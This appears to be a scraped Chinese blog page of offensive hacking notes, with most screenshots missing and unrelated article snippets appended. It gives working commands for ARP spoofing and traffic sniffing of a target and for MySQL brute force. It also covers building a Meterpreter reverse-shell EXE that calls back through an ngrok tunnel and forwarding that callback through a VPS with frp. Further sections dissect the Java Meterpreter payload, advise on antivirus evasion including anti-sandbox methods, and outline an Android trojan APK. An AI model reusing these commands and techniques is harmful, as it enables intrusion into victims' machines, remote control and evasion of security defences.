或者 便捷命令在这里插入图片描述
arpspoof命令进行断网攻击(ARP欺骗)
arpspoof -i eth0 -t 192.168.1.112 192.168.1.1
与网络有关的-i(interface)
网卡eth0
目标-t(target)
目标IP:192.168.1.112
目标主机网关192.168.1.1

ettercap -i eth0 -Tq
driftnet -i eth0 -b -a -d /pic

解释下这几个参数
-i 监听网卡
-b 声音提醒
-a 保存图片(图片不会显示)
-d 图片保存目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
sslstrip

Wordpress渗透之Wpscan工具

一、什么是Wpscan?什么是Wordpres?

1.Wpscan

 WPScan是一款针对wordpress的安全扫描软件;
 可以扫描出wordpress的版本,
 主题,插件,后台用户以及爆破后台用户密码等。

2.Wordpress

 WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,
 用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。
 也可以把 WordPress当作一个内容管理系统(CMS)来使用。
 WordPress有许多第三方开发的免费模板,安装方式简单易用。
 如果要做一个自己的模板,则需要有一定的专业知识,
 至少要懂的标准通用标记语言下的一个应用HTML代码、CSS、PHP等相关知识。

建站流程

  1. 注册域名
  2. 申请虚拟主机(国内主机:速度快,较贵,而空间较小;国外主机:便宜,速度慢,空间一般无限制)
  3. 在虚拟主机上绑定自己的域名
  4. 下载WordPress程序
  5. 修改域名的DNS解析
  6. 创建WordPress数据库
  7. 修改WordPress的安装配置文件
  8. 上传WordPress程序至ixwebhosting主机域名空间(ftp上传)
  9. 访问域名/wp-admin/install.php进行wordpress安装。填写博客信息及邮箱

二、Wpscan命令详解

  利用-h命令,可查看Wpscan的常用选项,功能介绍,例子等; 

root@kali:~# wpscan -h


    __          _______   _____                    
    \ \        / /  __ \ / ____|                   
     \ \  /\  / /| |__) | (___   ___  __ _ _ __    
      \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \   
       \  /\  /  | |     ____) | (__| (_| | | | |  
        \/  \/   |_|    |_____/ \___|\__,_|_| |_|  


    WordPress Security Scanner by the WPScan Team   
                   Version 2.8  
      Sponsored by Sucuri - https://sucuri.net   

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

 https://data.wpscan.org/plugins.json
https://data.wpscan.org/plugins.json.sha512
https://data.wpscan.org/themes.json
https://data.wpscan.org/themes.json.sha512
https://data.wpscan.org/wordpresses.json
https://data.wpscan.org/wordpresses.json.sha512
https://data.wpscan.org/timthumbs-v3.txt
https://data.wpscan.org/timthumbs-v3.txt.sha512
https://data.wpscan.org/config_backups.txt
https://data.wpscan.org/config_backups.txt.sha512
https://data.wpscan.org/db_exports.txt
https://data.wpscan.org/db_exports.txt.sha512
https://data.wpscan.org/dynamic_finders.yml
https://data.wpscan.org/dynamic_finders.yml.sha512
https://data.wpscan.org/wp_fingerprints.json
https://data.wpscan.org/wp_fingerprints.json.sha512
https://data.wpscan.org/LICENSE
https://data.wpscan.org/LICENSE.sha512
————————————————

在这里插入图片描述在这里插入图片描述在这里插入图片描述

C:\WINDOWS\system32\drivers\etc

在这里插入图片描述

在

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述


在这里插入图片描述
在这里插入图片描述

0708 centos matesploit 搭建

 yum groupinstall 'Development Tools'
 yum -y install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget
yum -y install ruby
yum -y install yaml
yum -y install postgresql

通过ngrok穿透反弹shell

0.0注册ngrok 内网穿透平台账号,开通免费隧道

网址:https://www.ngrok.cc

在这里插入图片描述
eg: 192.168.254.128 我的内网ip

在这里插入图片描述
在这里插入图片描述

0x01 下载安装穿透client客户端

地址:https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

在这里插入图片描述

unzip
   ./sunny  clientid 隧道id  

在这里插入图片描述
在这里插入图片描述

0x02 Msfvenom 木&马生成

kali命令 生成EXE木马文件:

 msfvenom  -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

在这里插入图片描述

0x03 启动msf 配置Exploit模块

 Use exploit/multi/handler

0x04 选择攻击载荷上线

  set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

 set
run/exploit

在这里插入图片描述

Frp将外网meterpreter转发至本地msf

https://github.com/fatedier/frp/releases【下载】
在这里插入图片描述
解压
● kali端 frpc配置

 [common]
server_addr = 121.5.64.200   #vps地址
server_port = 2580			#vps监听端口

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580		# msf载荷 监听端口 【即内网主机监听端口】
remote_port = 6666		# vps流量转发端口【流量出口 载荷端口】 

服务端

 [common]
bind_port = 2580  【服务端监听端口】
 ./frps(frpc) -c frps.ini (frpc.ini)  开启服务端(客户端)

systemctl start frps
systemctl restart frps
systemctl stop frps

● frp 连接流程
frps开启两个端口监听----< 内网客户端frpc 开启 tcp连接到 vps
vps–内网主机建立连接 连接1 建立

● 肉鸡上线 流程
载荷创建进程 主动连接 vps:载荷端口
管道流量转发 把 载荷端口 流量 通过tcp 连接 发包 传送到 内网kali端

● kali端 上线流程
kali端 frpc客户端 通过管道 将流量 转发给 msf handler -->监听端口

在这里插入图片描述

在这里插入图片描述

Msf Matesploit Framework 基础

在这里插入图片描述
漏洞框架 方便强大 框架全球性exp poc 脚本利于测试

术语

在这里插入图片描述

运行

在这里插入图片描述
在这里插入图片描述

cd = back
在这里插入图片描述

ls = dir pwd
在这里插入图片描述

banner
在这里插入图片描述

color
在这里插入图片描述

connect 链接一个主机、网络
edit 编辑一个模块
exit 退出控制台
get 获取变量
getg 全局变量
go_pro 进入GUI ····有的版本没有
grep 输出命令
info 查看模块详细信息
irb drop 进脚本模块 ruby
jobs 显示 你使用 的 模块
在这里插入图片描述

kill 处理掉一个 项目进程
load 加载一些插件
loadpath 插件路径
quit 退出控制台
route 做跳板代理
save 保存活跃数据
search 搜索漏洞模块

在这里插入图片描述

sessions 选择会话 -i x (shell 反弹回来 选择序号)

在这里插入图片描述

set 设置 参数 RHOSTS 地址/网段

在这里插入图片描述在这里插入图片描述

设置字典
在这里插入图片描述在这里插入图片描述unset
在这里插入图片描述
unsetg 全局重新设置

show options 查看配置选项
在这里插入图片描述
exploit 执行


在这里插入图片描述
db_connect 链接
在这里插入图片描述
db_disconnect 断开
db_export 导出
db_import 导入
db_nmap 扫描结果入库在这里插入图片描述
在这里插入图片描述

service postgresql start
在这里插入图片描述
status
在这里插入图片描述
service metasploit start

msfconsole
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
扫描结果

在这里插入图片描述

msfconsole
search mysql
use auxiliary/scanner/mysql/mysql_login

set RHOST 192.168.10.3
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要爆破成功就停止)
run 启动攻击,开始爆破

Windows10 Ruby

手撕metasploit中meterprter木马源码

在这里插入图片描述

前言

自从将CobaltStrike二开之后放在了GITHUB,
MSF的源码级免杀怎么做的,今天决定带大家手撕metasploit中meterpreter源码。

生成meterpreter木马

在这里插入图片描述

 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 > yanbuguohengyang.jar

使用Jd-Gui反编译Jar文件

下载Jd-Gui

 https://download.apponic.com/crTvxmk7KUri_YfUJhkmHBXYcZuqbStoYn0kPSXJn4kr1hhFaL4IrWGdr2GIbA7AtEJZOyNuCoTB2v39p-qywhEQwQgvEK1j7wQG4qZJ1Xv3DcJrJG8AHHDL05nArb0CmWEKPODCXLURQryUsOrnccH2p_4m1j8M_52d/

反编译Jar:
在这里插入图片描述

保存源代码

在这里插入图片描述
解压文件
在这里插入图片描述

分析源码

在这里插入图片描述
在这里插入图片描述

马儿开局声明了几个全局变量
1.判断当前的操作系统
2.获取当前系统的路径分割符
3.判断系统是否基于unix内核
4.判断路径分隔符是否是 “;”
5.获取Jdk的安装目录

在这里插入图片描述

1.创建IO流读取配置文件
2.获取配置文件中Executable字段
如果字段不为空
1.获取系统一定存在的系统路径
2.在一定存在的系统路径下创建 “~spawnxxxx.tmp.dir”文件
3.在创建的dir下创建一个文件名为 配置文件中key为Executable的目录
4.调用方法传入1.反射获取到的Payload对象,2.Executable的值,3.创建的文件 (内部将Executable的值写入到创建到的新文件下)
5.删除配置文件中的Executable
6.配置文件写入DroppedExecutable值为新创建的值的不同操作系统的绝对路径
此代码Executable字段为空,不去执行判断内容

在这里插入图片描述

配置文件内容如上图所示
1.spawn值下文阐述
2.LHOST为回连地址
3.LPORT为回连端口

在这里插入图片描述

1.获取spawn值内容
如果spawn值大于0则
1.将Spawn减去1重新赋值给配置文件的Spawn
2.获取当前系统临时路径.dir
3.将此文件(也就是木马文件)写入系统临时路径
4.将获取到的jdk路径运行被重新写入的马儿路径(此过程为spawn路径-1的过程)

如果spawn值不大于0则
在这里插入图片描述

1.读取配置文件的回连地址
2.读取配置文件的端口
3.如果端口小于0的情况此处不做赘述
4.如果端口不小于0则与获取到的回连地址与端口建立Socket连接
5.建立连接后使用IO流获取服务端返回结果
6.调用bootstrap()函数
在这里插入图片描述

1.使用IO流获取服务端返回内容
2.判断paramString是否为空(上文可知为空,所以为空的逻辑不做阐述)
3.通过反射找到javapayload.stage.
4.将反射获取到的类采用反射invoke函数执行
5.定义trycatch捕获异常抛出
以上为MSF木马源码逻辑总线,其余函数为辅助主线完成函数

在这里插入图片描述

其中包括
1.寻找临时文件绝对路径
2.寻找Jdk的路径
3.针对不同系统对路径分割符号的替换
但是这些都不重要。

如何做到源码级免杀

通过以上对MSF木马的刨析,可以看出MSF采用木马三次加载(根据spawn的值决定)最后释放恶意代码,但是若如此做的目的我尚且不详,
可能是为了起到免杀的作用.
还有就是这个马儿的通用性,它可以在不同的类型的操作系统上线是因为其中很多东西都做了动态处理,
如路径分隔符,jdk的动态查找等。

了解了以上几点内容最终分享一个源码级免杀的案例吧
在这里插入图片描述

代码中我去除了很多马儿的原有逻辑,如上文提到的兼容性等问题,循环加载等问题。
1.直接建立socket连接
2.直接将服务端的数据加载
3.不再从配置文件读取回连地址端口,硬编码写死
如此做保留了建立连接的关键性代码,做到了客户端和服务端的对接。

在这里插入图片描述

关于免杀
我一直认为源码级免杀是比shellcode的免杀要好做的,这其中的原因是因为源码级免杀牵扯很多api,杀软大多数只能通过木马特征来查杀,但是shellcode的免杀加载器所遇到的api,申请内存空间,创建线程运行等函数已经被列入高危函数,可免杀的发展空间并无源码级免杀发展的空间大。
1.这个客户端的免杀率我一年多前上传的时候是vt都过了的,现在我懒得上传了,大家自行研究吧。这篇文章是我继《Cobaltstrike免杀从源码级到落地思维转变》出的前文,原因是因为很多人看了那篇文章后让我出一个分析msf的文章做衔接。
2.还有些人问我免杀很好过,但是始终存在一个问题就是免杀的木马在相对时间过后无法免杀的问题,这其实就引申出来免杀平台的作用。杀软是一套程序,是程序就有自己的运行逻辑,如果我们掌握这种规律并且自己的逻辑在杀软逻辑之上的话,那么杀软只能追着免杀平台生成的木马封,永远都无法追上。具体的实现逻辑我不能说,大家体会吧……hahahaha
但是可以分为以下两点
1.shelcode的免杀,shellcode的随机性
2.加载器的免杀,加载器的随机性
3.反虚拟机,反虚拟机的红队调试
4.反沙箱,反沙箱的分析

  • Metasploit实战:SSH漏洞攻击

在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

  • kali linux 系列 —— Metasploit 信息收集

在这里插入图片描述在这里插入图片描述在这里插入图片描述

  • 注册信息
  • 邮箱
  • 电话
  • 地址
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
  • 大小写 敏感
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
  • 2.0 以后 开启postpresql 之后自动连接 还支持 mysql
  • 不然还得 db_connect
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述



在这里插入图片描述

  • KaliLinux——Metasploit&&shellcode日Android

在这里插入图片描述

#日android原理#
  • 生成android mu 马子 xxx.apk
  • 安装运行
  • 反弹连接——>PC
#日android条件#
  • 网络连通 手机在线 电脑内外网皆可
  • 让android安装apk(想办法 137 爆破或者 其他方法 在这里不表述)

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1219530.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

一文教会你SpringSecurity 自定义认证登录

目录 前言1-自定义用户对象2-自定义UserDetailsService3-自定义Authentication4-自定义AuthenticationProvider5-自定义AbstractAuthenticationProcessingFilter6-自定义认证成功和失败的处理类7-修改配置类8-测试 前言 现在登录方式越来越多&#xff0c;传统的账号密码登录已…

自动化测试,5个技巧轻松搞定

想要在质量保证团队中赢得核心&#xff1f;当你组建你的网络应用时要记住这些技巧&#xff0c;可以变得更容易分析并快速创建更多准确可重复的自动化测试。 1.歧义是敌人 尽可能使你的代码具体化。当然&#xff0c;你已经遵循了W3C标准&#xff0c;对吗&#xff1f;以下有三件…

中部高标准农田建设大会将于2024年8月在郑州召开

无农不稳、无粮则乱。农业保的是生命安全、生存安全&#xff0c;粮食安全是国家安全的重要基础。河南作为全国重要农业大省是国家重要粮食主产区&#xff0c;始终把粮食安全扛在肩上、抓在手上&#xff0c;把加快建设农业强省摆在重要位置。由振威国际会展集团等单位联合主办的…

美创科技与南京大数据安全技术有限公司达成战略合作

近日&#xff0c;美创科技与南京大数据安全技术有限公司正式签署战略合作协议&#xff0c;优势力量共享、共拓共创共赢。 美创科技CEO柳遵梁、副总裁罗亮亮、副总裁王利强&#xff0c;南京大数据安全技术有限公司总经理潘杰、市场总监刘莉莎、销售总监王皓月、技术总监薛松等出…

「分享学习」SpringCloudAlibaba高并发仿斗鱼直播平台实战完结

[分享学习]SpringCloudAlibaba高并发仿斗鱼直播平台实战完结 第一段&#xff1a;简介 Spring Cloud Alibaba是基于Spring Cloud和阿里巴巴开源技术的微效劳框架&#xff0c;普遍应用于大范围高并发的互联网应用系统。本文将引见如何运用Spring Cloud Alibaba构建一个高并发的仿…

骨传导蓝牙耳机排行榜,音质最好的五款TOP级骨传导耳机

骨传导蓝牙耳机排行榜中&#xff0c;音质最好的骨传导耳机有哪些呢&#xff1f; 目前骨传导耳机市场上有许多品牌&#xff0c;每个品牌都有自己的特点和优势。然而&#xff0c;在音质等性能方面&#xff0c;南卡品牌可以被认为是最好的。许多使用过骨传导耳机的用户都知道&…

日志存档及解析

网络中的每个设备都会生成大量日志数据&#xff0c;日志数据包含有关网络中发生的所有活动的关键信息&#xff0c;存储所有这些数据并对其进行管理对组织来说是一项挑战&#xff0c;因此&#xff0c;这些日志文件被压缩并存储在效率较低的存储介质中&#xff0c;无法轻松检索。…

联想Win11系统的任务栏格式调整为居中或居左

一 .目的 联想Win11系统的任务栏格式调整为居中或居左 二 .方法 2.1 鼠标任意放到电脑桌面位置&#xff0c;点击鼠标右键&#xff0c;显示后县级【显示设置】 2.2 个性化→任务栏→任务栏行为→对其方式&#xff1a;按需或个人习惯进行选择【靠左】 2.3 成功调整&#x…

基于plc的柔性制造系统供料检测单元的设计(论文+源码)

1.系统设计 本次基于plc的柔性制造系统供料检测单元的设计&#xff0c;其系统结构框图如图2.1所示&#xff0c;系统采用西门子S7-200 型号的PLC作为主控制器&#xff0c;并结合温度传感器&#xff0c;重量传感器&#xff0c;限位开关&#xff0c;变频器等器件来构成整个系统&a…

超详细的Monkey测试介绍

前言 Monkey 是Android SDK提供的一个命令行工具&#xff0c; 可以简单&#xff0c;方便地运行在任何版本的Android模拟器和实体设备上。 Monkey会发送伪随机的用户事件流&#xff0c;适合对app做压力测试 。 环境搭建 安装Android SDK 并配置环境变量 什么是Monkey 顾名…

Figma快速指南:3点核心技巧助你迅速掌握!

Figma确立了在线设计工具的形式&#xff0c;在国际上具有不可低估的影响力。Figma颠覆了传统的设计模式&#xff0c;不仅是为了设计师&#xff0c;也是为了设计本身。从产品经理到研究人员&#xff0c;从开发人员到营销人员&#xff0c;设计过程需要很多团队角色的参与&#xf…

element-china-area-data使用问题

使用CodeToText报错&#xff0c;下载的时候默认下载最新版本的&#xff0c; 稳定版本5.0.2版本才可以 npm install element-china-area-data5.0.2 -S

基于SpringBoot的SSMP整合案例(业务层基础开发与快速开发)

业务层基础开发 接口类public interface BookService {boolean save(Book book);boolean update(Book book);boolean delete(Integer id);Book getById(Integer id);List<Book> getAll();IPage<Book> getByPage(int currentPage,int pageSize);IPage<Book> …

c语言学习记录 c语言本身有什么

这里写自定义目录标题 欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题&#xff0c;有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants 创建一个自定义列表如何创建一个…

Docker容器启动时初始化MySQL数据库

1.前言   Docker在开发中使用的越来越多了&#xff0c;最近搞了一个Spring Boot应用&#xff0c;为了方便部署将Mysql也放在Docker中运行。那么怎么初始化 SQL脚本以及数据呢? 我这里有两个传统方案。 第一种方案是在容器启动后手动导入&#xff0c;太low了不行。第二种在Sp…

骨传导能保护听力吗?骨传导耳机是智商税吗?

先说答案&#xff0c;骨传导耳机是可以保护听力的&#xff01;并且骨传导耳机也不是智商税&#xff01;甚至在某些场景下&#xff0c;骨传导耳机比其他耳机更适合。 为什么说骨传导耳机会保护听力呢&#xff1f;因为骨传导耳机跟入耳式耳机的传递声音方式是不一样的&#xff0c…

将Agent技术的灵活性引入RPA,清华等发布自动化智能体ProAgent

近日&#xff0c;来自清华大学的研究人员联合面壁智能、中国人民大学、MIT、CMU 等机构共同发布了新一代流程自动化范式 “智能体流程自动化” Agentic Process Automation&#xff08;APA&#xff09;&#xff0c;结合大模型智能体帮助人类进行工作流构建&#xff0c;并让智能…

十大热门骨传导蓝牙耳机排行榜,精选最佳的五款骨传导蓝牙耳机

排行榜十大热门骨传导耳机&#xff0c;哪些才是综合实力最强的骨传导耳机&#xff1f; 近年来&#xff0c;骨传导耳机越来越受欢迎。由于骨传导耳机不需要插入耳朵&#xff0c;用户能够同时感知周围环境的声音&#xff0c;不会完全隔绝外界&#xff0c;增加了使用时的安全性。…

Hive Lateral View explode列为空时导致数据异常丢失

一、问题描述 日常工作中我们经常会遇到一些非结构化数据&#xff0c;因此常常会将Lateral View 结合explode使用&#xff0c;达到将非结构化数据转化成结构化数据的目的&#xff0c;但是该方法对应explode的内容是有非null限制的&#xff0c;否则就有可能造成数据缺失。 SE…

cocos----刚体

刚体&#xff08;Rigidbody&#xff09; 刚体&#xff08;Rigidbody&#xff09;是运动学&#xff08;Kinematic&#xff09;中的一个概念&#xff0c;指在运动中和受力作用后&#xff0c;形状和大小不变&#xff0c;而且内部各点的相对位置不变的物体。在 Unity3D 中&#xff…